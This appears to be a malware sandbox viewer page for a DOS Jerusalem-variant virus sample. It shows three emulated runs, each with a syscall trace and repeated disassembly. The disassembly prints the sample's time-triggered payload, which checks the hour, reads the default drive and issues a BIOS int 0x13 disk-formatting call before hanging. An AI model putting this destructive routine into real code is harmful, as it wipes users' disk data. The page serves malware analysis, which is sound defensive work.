Sample viewer

vx.netlux.org/Virus.DOS.Jerusalem.VerD.1653

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:05:18.109117345Z 240 PC: 12acd | UNKNOWN!
2018-12-17T23:05:18.111041369Z 240 PC: 12afd | UNKNOWN!
2018-12-17T23:05:18.112450987Z 74 PC: 12b88 | Reallocate memory
2018-12-17T23:05:18.114229787Z 53 PC: 12b8d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:05:18.116511942Z 37 PC: 12ba1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:05:18.117969907Z 44 PC: 12bde | Get time
0x12bde: cmp ch, 0x12
0x12be1: jne 0x12c0d
0x12be3: mov ah, 0x19
0x12be5: int 0x21
0x12be7: mov dl, al
0x12be9: cmp dl, 2
0x12bec: jb 0x12bf1
0x12bee: add dl, 0x7e
0x12bf1: mov ax, 0x509
0x12bf4: xor cx, cx
0x12bf6: inc cl
0x12bf8: xor dh, dh
0x12bfa: lea bx, word ptr [0x1c5]
0x12bfe: int 0x13
0x12c00: nop
0x12c01: jmp 0x12c00
0x12c03: add al, dh
0x12c05: add byte ptr [bx + si], al
0x12c07: add word ptr [bp + si], ax
0x12c09: nop
2018-12-17T23:05:18.120430807Z 75 PC: 12c19 | Execute program
2018-12-17T23:05:18.13592608Z 73 PC: 12c1f | Release memory
2018-12-17T23:05:18.137678363Z 77 PC: 12c23 | Get program return code
2018-12-17T23:05:18.139256289Z 49 PC: 12c31 | Terminate and stay resident (Return code = '0' | Memory size = '119')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":18,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15153,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:45.678096773Z 240 PC: 12acd | UNKNOWN!
2018-12-25T12:42:45.679620472Z 240 PC: 12afd | UNKNOWN!
2018-12-25T12:42:45.696665211Z 74 PC: 12b88 | Reallocate memory
2018-12-25T12:42:45.698258662Z 53 PC: 12b8d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:42:45.699504601Z 37 PC: 12ba1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:42:45.701940072Z 44 PC: 12bde | Get time
0x12bde: cmp ch, 0x12
0x12be1: jne 0x12c0d
0x12be3: mov ah, 0x19
0x12be5: int 0x21
0x12be7: mov dl, al
0x12be9: cmp dl, 2
0x12bec: jb 0x12bf1
0x12bee: add dl, 0x7e
0x12bf1: mov ax, 0x509
0x12bf4: xor cx, cx
0x12bf6: inc cl
0x12bf8: xor dh, dh
0x12bfa: lea bx, word ptr [0x1c5]
0x12bfe: int 0x13
0x12c00: nop
0x12c01: jmp 0x12c00
0x12c03: add al, dh
0x12c05: add byte ptr [bx + si], al
0x12c07: add word ptr [bp + si], ax
0x12c09: nop
2018-12-25T12:42:45.704748558Z 25 PC: 12be7 | Get default drive

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15153,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:45.736245811Z 240 PC: 12acd | UNKNOWN!
2018-12-25T12:42:45.737597978Z 240 PC: 12afd | UNKNOWN!
2018-12-25T12:42:45.73879121Z 74 PC: 12b88 | Reallocate memory
2018-12-25T12:42:45.740707565Z 53 PC: 12b8d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:42:45.742853733Z 37 PC: 12ba1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:42:45.744288483Z 44 PC: 12bde | Get time
0x12bde: cmp ch, 0x12
0x12be1: jne 0x12c0d
0x12be3: mov ah, 0x19
0x12be5: int 0x21
0x12be7: mov dl, al
0x12be9: cmp dl, 2
0x12bec: jb 0x12bf1
0x12bee: add dl, 0x7e
0x12bf1: mov ax, 0x509
0x12bf4: xor cx, cx
0x12bf6: inc cl
0x12bf8: xor dh, dh
0x12bfa: lea bx, word ptr [0x1c5]
0x12bfe: int 0x13
0x12c00: nop
0x12c01: jmp 0x12c00
0x12c03: add al, dh
0x12c05: add byte ptr [bx + si], al
0x12c07: add word ptr [bp + si], ax
0x12c09: nop
2018-12-25T12:42:45.746416385Z 75 PC: 12c19 | Execute program
2018-12-25T12:42:45.764664501Z 73 PC: 12c1f | Release memory
2018-12-25T12:42:45.76707745Z 77 PC: 12c23 | Get program return code
2018-12-25T12:42:45.768466791Z 49 PC: 12c31 | Terminate and stay resident (Return code = '0' | Memory size = '119')